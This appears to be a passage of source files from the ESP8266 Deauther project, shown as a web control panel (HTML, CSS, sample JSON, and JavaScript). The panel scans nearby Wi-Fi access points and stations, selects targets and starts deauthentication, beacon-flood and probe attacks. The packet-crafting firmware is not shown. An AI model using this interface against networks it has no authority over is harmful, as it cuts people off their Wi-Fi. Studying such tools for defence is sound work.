"b8:1d:aa:d5:6f:f0",
"don't!",
"[[[[not mine]]]]",
"",
1,
true
]
,[
"f4:6b:de:da:8d:95",
"Spacehuhn",
"--SpaceRouter!--",
"",
1,
false
]
,[
"00:11:22:33:44:55",
"TEST",
"JS sucks!",
"5c:37:3b:f7:67:be",
1,
true
]
] |
HTML | esp8266_deauther-2/web_interface/scan.html | <!--- This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther -->
<!Doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name="theme-color" content="#36393E">
<meta name="description" content="ESP8266 Deauther">
<title>ESP8266 Deauther</title>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="js/site.js"></script>
<script src="js/scan.js"></script>
</head>
<body onload="loadLang()">
<nav>
<ul class="menu">
<li><a href="scan.html" data-translate="scan">Scan</a></li>
<li><a href="ssids.html" data-translate="ssids">SSIDs</a></li>
<li><a href="attack.html" data-translate="attacks">Attack</a></li>
<li><a href="settings.html" data-translate="settings">Settings</a></li>
</ul>
</nav>
<div id="status"></div>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header" data-translate="scan">Scan</h1>
<button id=scanZero onclick="scan(0)">Scan APs</button>
<button id=scanOne onclick="scan(1)">Scan Stations</button>
<button id=RButton onclick="load()" data-translate="reload" class="right">Reload</button>
</div>
</div>
<div class="row">
<div class="col-6">
<label for="ch" data-translate="channel">Channel</label>
</div>
<div class="col-6">
<select id="ch" name="ch">
<option value="all" data-translate="all">All</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
</select>
</div>
</div>
<div class="row">
<div class="col-6">
<label data-translate="station_scan_time">Station Scan Time</label>
</div>
<div class="col-6">
<input type="number" value="15" id="scanTime">s
</div>
</div>
<div class="row">
<div class="col-12">
<p>
<span class="red" data-translate="info_span">INFO: </span><br>
<span data-translate="scan_info">
- Click Scan and wait until the blue LED on your board turns off (or changes to green), then
click on Reload.<br>
- The web interface will be unavailable during a station scan and you will have to
reconnect!<br>
- Please select only one target!<br>
</span>
<span data-translate="info_disclaimer">In case of an unexpected error, please reload the site and
look at the serial monitor for further debugging.</span>
</p>
<hr>
<h2><span>Access Points</span>: <span id="apNum"></span></h2>
<table id="apTable"></table>
<button onclick="selectAll(0,true)" data-translate="select_all">select all</button>
<button onclick="selectAll(0,false)" data-translate="deselect_all">deselect all</button>
<hr>
<h2><span>Stations</span>: <span id="stNum"></span></h2>
<table id="stTable"></table>
<button onclick="selectAll(1,true)" data-translate="select_all">select all</button>
<button onclick="selectAll(1,false)" data-translate="deselect_all">deselect all</button>
<hr>
<h2><span data-translate="devices">Saved Devices</span>: <span id="nNum"></span></h2>
<table id="nTable"></table>
<button onclick="selectAll(2,true)" data-translate="select_all">select all</button>
<button onclick="selectAll(2,false)" data-translate="deselect_all">deselect all</button>
<button onclick="add(2)" data-translate="new">new</button>
</div>
</div>
</div>
<footer>
<span id="version">Version 2.6.1</span>
<br>
<br>
<a href="http://deauther.maltronics.com" target="_blank">Wiki</a> | <a href="info.html">Credits</a>
</footer>
</body>
</html> |
JSON | esp8266_deauther-2/web_interface/scan.json | {
"aps":[
[
"Don't",
"--SpaceRouter!--",
6,
-57,
"WPA2",
"f4:6b:de:da:8d:95",
"Spacehuhn",
false
],
[
"call",
"",
1,
-80,
"-",
"cc:cf:1e:d5:5b:2b",
"SpaceLtd",
true
],
[
"it",
"",
6,
-81,
"WPA*",
"5c:37:3b:f7:67:be",
"SpaceBox",
false
],
[
"a",
"",
8,
-82,
"WPA2",
"cd:ce:1e:0a:4e:9e",
"SpacEEE",
false
],
[
"jammer",
"",
8,
-83,
"WPA2",
"c7:0e:14:95:a1:3b",
"Chicken!",
false
],
[
"Don't call it a Jammer! DON'T !!",
"",
8,
-90,
"WPA2",
"c8:0e:14:95:a1:3b",
"Huhn",
false
]
],
"stations":[
[
"04:d7:aa:dc:6e:5a",
6,
"",
"Just",
168,
2,
"<1sec",
false
],
[
"b8:1d:aa:d5:6f:f0",
8,
"[[[[not mine]]]]",
"don't!",
2,
4,
"<1sec",
true
],
[
"58:41:4e:7a:dd:1b",
8,
"",
"OK?!",
2,
3,
"<1min",
false
]
]
} |
HTML | esp8266_deauther-2/web_interface/settings.html | <!--- This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther -->
<!Doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name="theme-color" content="#36393E">
<meta name="description" content="ESP8266 Deauther">
<title>ESP8266 Deauther</title>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="js/site.js"></script>
<script src="js/settings.js"></script>
</head>
<body onload="loadLang()">
<nav>
<ul class="menu">
<li><a href="scan.html" data-translate="scan">Scan</a></li>
<li><a href="ssids.html" data-translate="ssids">SSIDs</a></li>
<li><a href="attack.html" data-translate="attacks">Attack</a></li>
<li><a href="settings.html" data-translate="settings">Settings</a></li>
</ul>
</nav>
<div id="status"></div>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header" data-translate="settings">Settings</h1>
<button
onclick="getFile('run?cmd=stopap');alert('Turning off access point now. Restart your Deauther to be able to connect again.')"
class="red" data-translate="wifi_off">WiFi off</button>
<button onclick="getFile('run?cmd=reset;;save settings')" class="red"
data-translate="reset">Reset</button>
<button onclick="getFile('run?cmd=reboot')" class="red right" data-translate="reboot">reboot</button>
<p>
<span class="red" data-translate="info_span">INFO:</span><br>
<span data-translate="settings_info">
- Some settings require a reboot.<br>
- Click save to make sure that your changes are applied.<br>
</span>
<span data-translate="info_disclaimer">In case of an unexpected error, please reload the site and
look at the serial monitor for further debugging.</span><br>
</p>
<button onclick="save()" data-translate="save">save</button>
<button onclick="load()" class="right" data-translate="reload">reload</button>
</div>
</div>
<div id="settingsList"></div>
</div>
<footer>
<span id="version">Version 2.6.1</span>
<br>
<br>
<a href="http://deauther.maltronics.com" target="_blank">Wiki</a> | <a href="info.html">Credits</a>
</footer>
</body>
</html> |
JSON | esp8266_deauther-2/web_interface/settings.json | {
"version": "over9000",
"ssid": "pwned",
"password": "deauther",
"channel": 1,
"hidden": false,
"captivePortal": true,
"lang": "en",
"autosave": true,
"autosavetime": 30000,
"display": false,
"displayTimeout": 600,
"serial": true,
"serialEcho": true,
"web": true,
"led": true,
"maxch": 14,
"macSt": "aa:bb:cc:dd:ee:ff",
"macAP": "00:11:22:33:44:55",
"chtime": 384,
"minDeauths": 3,
"attacktimeout": 600,
"deauthspertarget": 20,
"deauthReason": 1,
"beaconchannel": false,
"beaconInterval": false,
"randomTX": false,
"probesPerSSID": 1
} |
HTML | esp8266_deauther-2/web_interface/ssids.html | <!--- This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther -->
<!Doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name="theme-color" content="#36393E">
<meta name="description" content="ESP8266 Deauther">
<title>ESP8266 Deauther</title>
<link rel="stylesheet" type="text/css" href="style.css">
<script src="js/site.js"></script>
<script src="js/ssids.js"></script>
</head>
<body onload="loadLang()">
<nav>
<ul class="menu">
<li><a href="scan.html" data-translate="scan">Scan</a></li>
<li><a href="ssids.html" data-translate="ssids">SSIDs</a></li>
<li><a href="attack.html" data-translate="attacks">Attack</a></li>
<li><a href="settings.html" data-translate="settings">Settings</a></li>
</ul>
</nav>
<div id="status"></div>
<div class="container">
<div class="row">
<div class="col-12">
<h1 class="header" data-translate="ssids">SSIDs</h1>
</div>
</div>
<div class="row">
<div class="col-6">
<label for="ssid">SSID</label>
</div>
<div class="col-6">
<input type="text" id="ssid" name="ssid" placeholder="SSID" maxlength="32">
</div>
</div>
<div class="row">
<div class="col-6">
<label>WPA2</label>
</div>
<div class="col-6">
<label class='checkBoxContainer'><input id="enc" type='checkbox'><span class='checkmark'></span></label>
</div>
</div>
<div class="row">
<div class="col-6">
<label data-translate="number">Number</label>
</div>
<div class="col-6">
<input id="ssidNum" type="number" value="1" max="60" min="1">
</div>
</div>
<div class="row">
<div class="col-6">
<label data-translate="overwrite">Overwrite</label>
</div>
<div class="col-6">
<label class='checkBoxContainer'><input id="overwrite" type='checkbox' checked><span
class='checkmark'></span></label>
</div>
</div>
<div class="row">
<div class="col-12">
<button onclick="add()" data-translate="add">add</button>
<button onclick="addSelected()" data-translate="add_selected">clone selected APs</button>
</div>
</div>
<div class="row">
<div class="col-12">
<button onclick="load()" class="right" data-translate="reload">Reload</button>
<p>
<span class="red" data-translate="info_span">INFO:</span><br>
<span data-translate="ssids_info">
- This SSID list is used for the beacon and probe attack.<br>
- Each SSID can be up to 32 characters.<br>
- Don't forget to click save when you edited a SSID.<br>
- You have to click Reload after cloning SSIDs.<br>
</span>
<span data-translate="info_disclaimer">In case of an unexpected error, please reload the site and
look at the serial monitor for further debugging.</span><br>
</p>
<hr>
</div>
</div>
<div class="row">
<div class="col-6">
<label for="interval" data-translate="time_interval">Time Interval</label>
</div>
<div class="col-6">
<input id="interval" name="interval" type="number" value="10" max="600" min="1">s
</div>
</div>
<div class="row">
<div class="col-12">
<button onclick="enableRandom()" id="randomBtn">Enable Random Mode</button>
<p data-translate="random_desc">Enable the random mode to generate a random SSID list in a given
interval.</p>
<hr>
<table id="ssidTable"></table>
<button onclick="removeAll()" class="red" data-translate="remove_all">Remove All</button>
</div>
</div>
</div>
<footer>
<span id="version">Version 2.6.1</span>
<br>
<br>
<a href="http://deauther.maltronics.com" target="_blank">Wiki</a> | <a href="info.html">Credits</a>
</footer>
</body>
</html> |
JSON | esp8266_deauther-2/web_interface/ssids.json | {
"random": false,
"ssids":[
[
"Cthulhu fm'latgh stell'bsna",
false,
27
],
[
"Nyarlathotep, vulgtm",
false,
20
],
[
"Sgn'wahl phlegeth",
false,
17
],
[
"Nyarlathotep nnnee, ehye",
true,
24
],
[
"Phlegeth ph'Yoggoth",
true,
19
],
[
"fm'latgh ilyaa, llll",
true,
20
],
[
"Lloigog gotha h'n'ghft",
true,
22
],
[
"n'gha, h'goka",
false,
13
],
[
"Sll'ha Azathoth",
true,
15
],
[
"zhro tharanak, kn'a",
false,
19
],
[
"Sll'haor phlegethog",
true,
19
],
[
"y'hah lw'nafh, cee",
true,
18
],
[
"Kn'a mnahn' li'heeagl",
true,
21
],
[
"h'lw'nafh, R'lyeh",
true,
17
],
[
"Ya bug Tsathoggua",
false,
17
],
[
"ah, fm'latgh",
false,
12
],
[
"F'ilyaa ebunma tharanak",
true,
23
],
[
"kadishtu, nilgh'ri",
true,
18
],
[
"R'luh nog gof'nn",
true,
16
],
[
"hriiagl, stell'bsna",
false,
19
],
[
"R'lyeh nnnYoggoth",
false,
17
],
[
"syha'h nnnilyaa, R'lyeh",
false,
23
],
[
"Nghai s'uhn bug",
false,
15
],
[
"zhro, sgn'wahl",
false,
14
],
[
"F'ftaghu throd",
true,
14
],
[
"h'hai nnnnog, bug",
false,
17
],
[
"Ulnyar ron uaaah",
true,
16
],
[
"ngphlegeth, R'lyeh",
false,
18
],
[
"Ch' nw n'ghftog",
true,
15
],
[
"lloig, ph'n'ghft",
true,
16
],
[
"Ahnyth throd nas'uhn",
false,
20
],
[
"y'hahagl, f'sgn'wahl",
true,
20
],
[
"Throdnyth zhro sll'ha",
true,
21
],
[
"naflvulgtm, nnnnw",
true,
17
],
[
"Ngehye Hasturnyth nnnorr'e",
true,
26
],
[
"ftaghuoth, mg",
true,
13
],
[
"Lloig naflebunma y-Chaugnar",
false,
27
],
[
"Faugn ph'uaaah, naflmg",
false,
22
],
[
"Azathoth shugg gotha",
false,
20
],
[
"Hastur, fhtagn",
false,
14
],
[
"Lw'nafh nognyth",
true,
15
],
[
"nnngrah'n hrii, s'uhn",
false,
21
],
[
"Hai kadishtunyth",
false,
16
],
[
"nahlirgh uh'e, athgog",
true,
21
],
[
"Nilgh'ri R'lyeh",
true,
15
],
[
"nglw'nafh 'bthnk, ph'mnahn'",
true,
27
],
[
"Tharanak ehye kadishtuoth",
true,
25
],
[
"bug, hupadgh",
true,
12
],
[
"Nnnvulgtlagln sgn'wahl",
true,
22
],
[
"ph'goka nafln'gha, y-'bthnk",
true,
27
],
[
"Dagon ilyaa throd",
true,
17
],
[
"sgn'wahl, uln",
false,
13
],
[
"Shub-Niggurath naChaugnar",
true,
25
],
[
"Faugn f'r'luh phlegeth, lw'nafh",
true,
31
],
[
"Ebunma ehye hlirgh",
false,
18
],
[
"Shub-Niggurath, ilyaa",
true,
21
],
[
"Cgeb gnaiih Dagon",
true,
17
],
[
"gnaiih, nnnn'ghft",
false,
17
],
[
"Hlirgh k'yarnak",
false,
15
],
[
"ch', Cthulhu",
false,
12
]
]
} |
esp8266_deauther-2/web_interface/style.css | /* This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther */
/* Global */
body {
background: #36393e;
color: #bfbfbf;
font-family: sans-serif;
margin: 0;
}
h1 {
font-size: 1.7rem;
margin-top: 1rem;
background: #2f3136;
color: #bfbfbb;
padding: 0.2em 1em;
border-radius: 3px;
border-left: solid #20c20e 5px;
font-weight: 100;
}
h2 {
font-size: 1.1rem;
margin-top: 1rem;
background: #2f3136;
color: #bfbfbb;
padding: 0.4em 1.8em;
border-radius: 3px;
border-left: solid #20c20e 5px;
font-weight: 100;
}
table{
border-collapse: collapse;
}
label{
line-height: 38px;
}
p{
margin: 0.5em 0;
}
.left {
float: left;
}
.right {
float: right;
}
.bold {
font-weight: bold;
}
.red{
color: #F04747;
}
.green{
color:#43B581;
}
.clear {
clear: both;
}
.centered{
text-align: center;
}
.select{
width: 98px !important;
padding: 0 !important;
}
.selected{
background: #4974a9;
}
.status{
width: 120px;
padding-left: 8px;
}
.labelFix {
line-height: 44px;
}
.clickable{
cursor: pointer;
}
.settingName{
text-transform: uppercase;
font-weight: bold;
text-decoration: underline;
}
#status {
text-align: center;
text-transform: capitalize;
padding: 5px;
color: #fff;
position: sticky;
top: 0;
z-index: 99;
}
#closeError{
float: right;
color: #fff;
padding: 0px 10px;
cursor: pointer;
}
footer {
font-size: .95em;
text-align: center;
margin-top: 3em;
margin-bottom: 3em;
}
/* ===== CHECKBOX ===== */
/* Customize the label (the container) */
.checkBoxContainer {
display: block;
position: relative;
padding-left: 35px;
margin-bottom: 12px;
cursor: pointer;
font-size: 22px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
height: 32px;
}
/* Hide the browser's default checkbox */
.checkBoxContainer input {
position: absolute;
opacity: 0;
cursor: pointer;
}
/* Create a custom checkbox */
.checkmark {
position: absolute;
top: 8px;
left: 0;
height: 28px;
width: 28px;
background-color: #2F3136;
border-radius: 4px;
}
/* Create the checkmark/indicator (hidden when not checked) */
.checkmark:after {
content: "";
position: absolute;
display: none;
}
/* Show the checkmark when checked */
.checkBoxContainer input:checked ~ .checkmark:after {
display: block;
}
.checkBoxContainer .checkmark:after {
left: 10px;
top: 7px;
width: 4px;
height: 10px;
border: solid white;
border-width: 0 3px 3px 0;
-webkit-transform: rotate(45deg);
-ms-transform: rotate(45deg);
transform: rotate(45deg);
}
/* ERROR */
.hide {
display: none;
}
.show {
display: block !important;
animation-name: fadeIn;
animation-duration: 1s;
}
@keyframes fadeIn {
0% {opacity: 0;}
100% {opacity: 1;}
}
hr {
background: #3e4146;
}
a {
color: #5281bb;
text-decoration: none;
}
a:hover {
color: #95b8e4;
}
li{
margin: 4px 0;
}
/* Meter */
.meter_background{
background: #42464D;
width: 100%;
word-break: normal;
min-width: 100px;
}
.meter_forground{
color: #fff;
padding: 4px 0;
/* + one of the colors below
(width will be set by the JS) */
}
.meter_green{
background: #43B581;
}
.meter_orange{
background: #FAA61A;
}
.meter_red{
background: #F04747;
}
.meter_value{
padding-left: 8px;
}
/* Tables */
table {
width: 100%;
min-width: 400px;
margin-bottom: 2em;
}
td{
word-break: break-all;
}
th{
word-break: break-word;
}
th, td {
padding: 10px 6px;
text-align: left;
border-bottom: 1px solid #5d5d5d;
}
@media screen and (max-width: 820px) {
#apTable .id,
#apTable .enc,
#apTable .mac,
#apTable .vendor,
#apTable .name,
#stTable .id,
#stTable .pkts,
#stTable .lastseen,
#stTable .mac,
#nTable .id,
#nTable .vendor,
#nTable .ap,
#nTable .mac,
#ssidTable .id {
display: none;
}
.meter_background{
min-width: 45px;
}
}
nav {
display: block;
background: #1d2236;
font-weight: bold;
padding: 0 10px;
}
nav a {
color: inherit;
padding: 0 .5em;
}
.menu {
list-style-type: none;
margin: 0;
padding: 0;
margin: 0 auto;
display: flex;
flex-direction: row;
display:block;
}
.menu li {
margin: 10px 20px 10px 0;
display: inline-block;
}
.menu li:last-child {
float: right;
}
/* Inputs and buttons */
.upload-script, .button, button, input[type="submit"], input[type="reset"], input[type="button"] {
display: inline-block;
height: 38px;
padding: 0 20px;
color:#fff;
text-align: center;
font-size: 11px;
font-weight: 600;
line-height: 38px;
letter-spacing: .1rem;
text-transform: uppercase;
text-decoration: none;
white-space: nowrap;
background: #2f3136;
border-radius: 4px;
border: none;
cursor: pointer;
box-sizing: border-box;
}
button:hover, input[type="submit"]:hover, input[type="reset"]:hover, input[type="button"]:hover {
background: #42444a;
}
button:active, input[type="submit"]:active, input[type="reset"]:active, input[type="button"]:active {
transform: scale(.93);
}
button:disabled:hover, input[type="submit"]:disabled:hover, input[type="reset"]:disabled:hover, input[type="button"]:disabled:hover {
background: white;
cursor: not-allowed;
opacity: 0.40;
filter: alpha(opacity=40);
transform: scale(1);
}
button::-moz-focus-inner {
border: 0;
}
/* Forms */
input[type="email"], input[type="number"], input[type="search"], input[type="text"], input[type="tel"], input[type="url"], input[type="password"], textarea, select {
height: 38px;
padding: 6px 10px; /* The 6px vertically centers text on FF, ignored by Webkit */
background-color: #2f3136;
border-radius: 4px;
box-shadow: none;
box-sizing: border-box;
color: #d4d4d4;
border: none;
width: 5em;
}
input[type="text"]{
width: 10em;
}
.setting {
width: 100% !important;
max-width: 284px !important;
}
input[type="file"] {
display: none;
}
/* ==== GRID SYSTEM ==== */
.container {
width: 100%;
margin-left: auto;
margin-right: auto;
max-width: 1140px;
}
.row {
position: relative;
width: 100%;
}
.row [class^="col"] {
float: left;
margin: 0.25rem 2%;
min-height: 0.125rem;
}
.col-1,
.col-2,
.col-3,
.col-4,
.col-5,
.col-6,
.col-7,
.col-8,
.col-9,
.col-10,
.col-11,
.col-12 {
width: 96%;
}
.row::after {
content: "";
display: table;
clear: both;
}
.hidden-sm {
display: none;
}
@media only screen and (min-width: 24em) {
.col-1 {
width: 4.33%;
}
.col-2 {
width: 12.66%;
}
.col-3 {
width: 21%;
}
.col-4 {
width: 29.33%;
}
.col-5 {
width: 37.66%;
}
.col-6 {
width: 46%;
}
.col-7 {
width: 54.33%;
}
.col-8 {
width: 62.66%;
}
.col-9 {
width: 71%;
}
.col-10 {
width: 79.33%;
}
.col-11 {
width: 87.66%;
}
.col-12 {
width: 96%;
}
.hidden-sm {
display: block;
}
} |
|
JavaScript | esp8266_deauther-2/web_interface/js/attack.js | /* This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther */
var attackJSON = [[false, 0, 0], [false, 0, 0], [false, 0, 0]];
function draw() {
getE("deauth").innerHTML = attackJSON[0][0] ? lang("stop") : lang("start");
getE("beacon").innerHTML = attackJSON[1][0] ? lang("stop") : lang("start");
getE("probe").innerHTML = attackJSON[2][0] ? lang("stop") : lang("start");
getE("deauthTargets").innerHTML = esc(attackJSON[0][1] + "");
getE("beaconTargets").innerHTML = esc(attackJSON[1][1] + "");
getE("probeTargets").innerHTML = esc(attackJSON[2][1] + "");
getE("deauthPkts").innerHTML = esc(attackJSON[0][2] + "/" + attackJSON[0][3]);
getE("beaconPkts").innerHTML = esc(attackJSON[1][2] + "/" + attackJSON[1][3]);
getE("probePkts").innerHTML = esc(attackJSON[2][2] + "/" + attackJSON[2][3]);
getE("allpkts").innerHTML = esc(attackJSON[3] + "");
}
function stopAll() {
getFile("run?cmd=stop attack", function () {
load();
});
}
function start(mode) {
switch (mode) {
case 0:
attackJSON[0][0] = !attackJSON[0][0];
break;
case 1:
attackJSON[1][0] = !attackJSON[1][0];
break;
case 2:
attackJSON[2][0] = !attackJSON[2][0];
break;
}
getFile("run?cmd=attack" + (attackJSON[0][0] ? " -d" : "") + (attackJSON[1][0] ? " -b" : "") + (attackJSON[2][0] ? " -p" : ""), function () {
setTimeout(load, 2000);
draw();
});
}
function load() {
getFile("attack.json", function (response) {
attackJSON = JSON.parse(response);
console.log(response);
showMessage("connected");
draw();
});
} |
JavaScript | esp8266_deauther-2/web_interface/js/scan.js | /* This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther */
var nameJson = [];
var scanJson = { aps: [], stations: [] };
function drawScan() {
var html;
var selected;
var width;
var color;
var macVendor;
// Access Points
getE("apNum").innerHTML = scanJson.aps.length;
html = "<tr>"
+ "<th class='id'></th>"
+ "<th class='ssid'>SSID</th>"
+ "<th class='name'>Name</th>"
+ "<th class='ch'>Ch</th>"
+ "<th class='rssi'>RSSI</th>"
+ "<th class='enc'>Enc</th>"
+ "<th class='lock'></th>"
+ "<th class='mac'>MAC</th>"
+ "<th class='vendor'>Vendor</th>"
+ "<th class='selectColumn'></th>"
+ "<th class='remove'></th>"
+ "</tr>";
for (var i = 0; i < scanJson.aps.length; i++) {
selected = scanJson.aps[i][scanJson.aps[i].length - 1];
width = parseInt(scanJson.aps[i][3]) + 130;
if (width < 50) color = "meter_red";
else if (width < 70) color = "meter_orange";
else color = "meter_green";
html += (selected ? "<tr class='selected'>" : "<tr>")
+ "<td class='id'>" + i + "</td>" // ID
+ "<td class='ssid'>" + esc(scanJson.aps[i][0]) + "</td>" // SSID
+ "<td class='name'>" + (scanJson.aps[i][1].length > 0 ? esc(scanJson.aps[i][1]) : "<button onclick='add(0," + i + ")'>" + lang("add") + "</button>") + "</td>" // Name
+ "<td class='ch'>" + esc(scanJson.aps[i][2]) + "</td>" // Ch
// RSSI
+ "<td class='rssi'><div class='meter_background'> <div class='meter_forground " + color + "' style='width: " + width + "%;'><div class='meter_value'>" + scanJson.aps[i][3] + "</div></div> </div></td>"
+ "<td class='enc'>" + esc(scanJson.aps[i][4]) + "</td>" // ENC
+ "<td class='lock'>" + (scanJson.aps[i][4] == "-" ? "" : "🔒") + "</td>" // Lock Emoji
+ "<td class='mac'>" + esc(scanJson.aps[i][5]) + "</td>" // MAC
+ "<td class='vendor'>" + esc(scanJson.aps[i][6]) + "</td>" // Vendor
// Select
+ "<td class='selectColumn'><label class='checkBoxContainer'><input type='checkbox' " + (selected ? "checked" : "") + " onclick='selectRow(0," + i + "," + (selected ? "false" : "true") + ")'><span class='checkmark'></span></label></td>"
+ "<td class='remove'><button class='red' onclick='remove(0," + i + ")'>X</button></td>" // Remove
+ "</tr>";
}
getE("apTable").innerHTML = html;
// Stations
getE("stNum").innerHTML = scanJson.stations.length;
html = "<tr>"
+ "<th class='id'></th>"
+ "<th class='vendor'>Vendor</th>"
+ "<th class='mac'>MAC</th>"
+ "<th class='ch'>Ch</th>"
+ "<th class='name'>Name</th>"
+ "<th class='pkts'>Pkts</th>"
+ "<th class='ap'>AP</th>"
+ "<th class='lastseen'>Last seen</th>"
+ "<th class='selectColumn'></th>"
+ "<th class='remove'></th>"
+ "</tr>";
for (var i = 0; i < scanJson.stations.length; i++) {
selected = scanJson.stations[i][scanJson.stations[i].length - 1];
ap = "";
if (scanJson.stations[i][5] >= 0)
ap = esc(scanJson.aps[scanJson.stations[i][5]][0]);
html += (selected ? "<tr class='selected'>" : "<tr>")
+ "<td class='id'>" + i + "</td>" // ID
+ "<td class='vendor'>" + esc(scanJson.stations[i][3]) + "</td>" // Vendor
+ "<td class='mac'>" + esc(scanJson.stations[i][0]) + "</td>" // MAC
+ "<td class='ch'>" + esc(scanJson.stations[i][1]) + "</td>" // Ch
+ "<td class='name'>" + (scanJson.stations[i][2].length > 0 ? esc(scanJson.stations[i][2]) : "<button onclick='add(1," + i + ")'>" + lang("add") + "</button>") + "</td>" // Name
+ "<td class='pkts'>" + esc(scanJson.stations[i][4]) + "</td>" // Pkts
+ "<td class='ap'>" + ap + "</td>" // AP
+ "<td class='lastseen'>" + esc(scanJson.stations[i][6]) + "</td>" // Last seen
// Select
+ "<td class='selectColumn'><label class='checkBoxContainer'><input type='checkbox' " + (selected ? "checked" : "") + " onclick='selectRow(1," + i + "," + (selected ? "false" : "true") + ")'><span class='checkmark'></span></label></td>"
+ "<td class='remove'><button class='red' onclick='remove(1," + i + ")'>X</button></td>" // Remove
+ "</tr>";
}
getE("stTable").innerHTML = html;
}
function drawNames() {
var html;
var selected;
// Names
getE("nNum").innerHTML = nameJson.length;
html = "<tr>"
+ "<th class='id'></th>"
+ "<th class='mac'>MAC</th>"
+ "<th class='vendor'>Vendor</th>"
+ "<th class='name'>Name</th>"
+ "<th class='ap'>AP-BSSID</th>"
+ "<th class='ch'>Ch</th>"
+ "<th class='save'></th>"
+ "<th class='selectColumn'></th>"
+ "<th class='remove'></th>"
+ "</tr>";
for (var i = 0; i < nameJson.length; i++) {
selected = nameJson[i][nameJson[i].length - 1];
html += (selected ? "<tr class='selected'>" : "<tr>")
+ "<td class='id'>" + i + "</td>" // ID
+ "<td class='mac' contentEditable='true' id='name_" + i + "_mac'>" + esc(nameJson[i][0]) + "</td>" // MAC
+ "<td class='vendor'>" + esc(nameJson[i][1]) + "</td>" // Vendor
+ "<td class='name' contentEditable='true' id='name_" + i + "_name'>" + esc(nameJson[i][2].substring(0, 16)) + "</td>" // Name
+ "<td class='ap' contentEditable='true' id='name_" + i + "_apbssid'>" + esc(nameJson[i][3]) + "</td>" // AP-BSSID
+ "<td class='ch' contentEditable='true' id='name_" + i + "_ch'>" + esc(nameJson[i][4]) + "</td>" // Ch
+ "<td class='save'><button class='green' onclick='save(" + i + ")'>" + lang("save") + "</button></td>" // Save
// Select
+ "<td class='selectColumn'><label class='checkBoxContainer'><input type='checkbox' " + (selected ? "checked" : "") + " onclick='selectRow(2," + i + "," + (selected ? "false" : "true") + ")'><span class='checkmark'></span></label></td>"
+ "<td class='remove'><button class='red' onclick='remove(2," + i + ")'>X</button></td>" // Remove
+ "</tr>";
}
getE("nTable").innerHTML = html;
}
var duts;
var elxtime;
function scan(type) {
getE('RButton').disabled = true;
switch (type) {
case 0:
getE('scanOne').disabled = true;
getE('scanZero').style.visibility = 'hidden';
elxtime = 2450;
break;
case 1:
getE('scanZero').disabled = true;
getE('scanOne').style.visibility = 'hidden';
elxtime = parseInt(getE("scanTime").value + "000") + 1500;
}
var cmdStr = "scan "
+ (type == 0 ? "aps " : "stations -t " + getE("scanTime").value + "s")
+ " -ch " + getE("ch").options[getE("ch").selectedIndex].value;
getFile("run?cmd=" + cmdStr);
duts = parseInt(type);
setTimeout(buttonFunc, elxtime);
setTimeout(load, elxtime);
}
function buttonFunc() {
switch (duts) {
case 0:
getE('scanZero').style.visibility = 'visible';
getE('scanOne').disabled = false;
break;
case 1:
getE('scanOne').style.visibility = 'visible';
getE('scanZero').disabled = false;
}
getE('RButton').disabled = false;
}
function load() {
// APs and Stations
getFile("run?cmd=save scan", function () {
getFile("scan.json", function (res) {
scanJson = JSON.parse(res);
showMessage("connected");
drawScan();
});
});
// Names
getFile("run?cmd=save names", function () {
getFile("names.json", function (res) {
nameJson = JSON.parse(res);
showMessage("connected");
drawNames();
});
});
}
function selectRow(type, id, selected) {
switch (type) {
case 0:
scanJson.aps[id][7] = selected;
drawScan();
getFile("run?cmd=" + (selected ? "" : "de") + "select ap " + id);
break;
case 1:
scanJson.stations[id][7] = selected;
drawScan();
getFile("run?cmd=" + (selected ? "" : "de") + "select station " + id);
break;
case 2:
save(id);
nameJson[id][5] = selected;
drawNames();
getFile("run?cmd=" + (selected ? "" : "de") + "select name " + id);
}
}
function remove(type, id) {
switch (type) {
case 0:
scanJson.aps.splice(id, 1);
drawScan();
getFile("run?cmd=remove ap " + id);
break;
case 1:
scanJson.stations.splice(id, 1);
drawScan();
getFile("run?cmd=remove station " + id);
break;
case 2:
nameJson.splice(id, 1);
drawNames();
getFile("run?cmd=remove name " + id);
}
}
function save(id) {
var mac = getE("name_" + id + "_mac").innerHTML.replace("<br>", "");
var name = getE("name_" + id + "_name").innerHTML.replace("<br>", "");
var apbssid = getE("name_" + id + "_apbssid").innerHTML.replace("<br>", "");
var ch = getE("name_" + id + "_ch").innerHTML.replace("<br>", "");
var changed = mac != nameJson[id][0] || name != nameJson[id][2] || apbssid != nameJson[id][3] || ch != nameJson[id][4];
if (changed) {
nameJson[id][0] = mac;
nameJson[id][2] = name;
nameJson[id][3] = apbssid;
nameJson[id][4] = ch;
if (nameJson[id][0].length != 17) {
showMessage("ERROR: MAC invalid");
return;
}
getFile("run?cmd=replace name " + id + " -n \"" + nameJson[id][2] + "\" -m \"" + nameJson[id][0] + "\" -ch " + nameJson[id][4] + " -b \"" + nameJson[id][3] + "\" " + (nameJson[id][5] ? "-s" : ""));
drawNames();
}
}
function add(type, id) {
if (nameJson.length >= 25) {
showMessage("Device Name List is full!");
return;
}
switch (type) {
case 0:
getFile("run?cmd=add name \"" + scanJson.aps[id][0] + "\" -ap " + id);
scanJson.aps[id][1] = scanJson.aps[id][0]; // name = SSID
nameJson.push([scanJson.aps[id][5], scanJson.aps[id][6], scanJson.aps[id][0], "", scanJson.aps[id][2], false]);
drawScan();
break;
case 1:
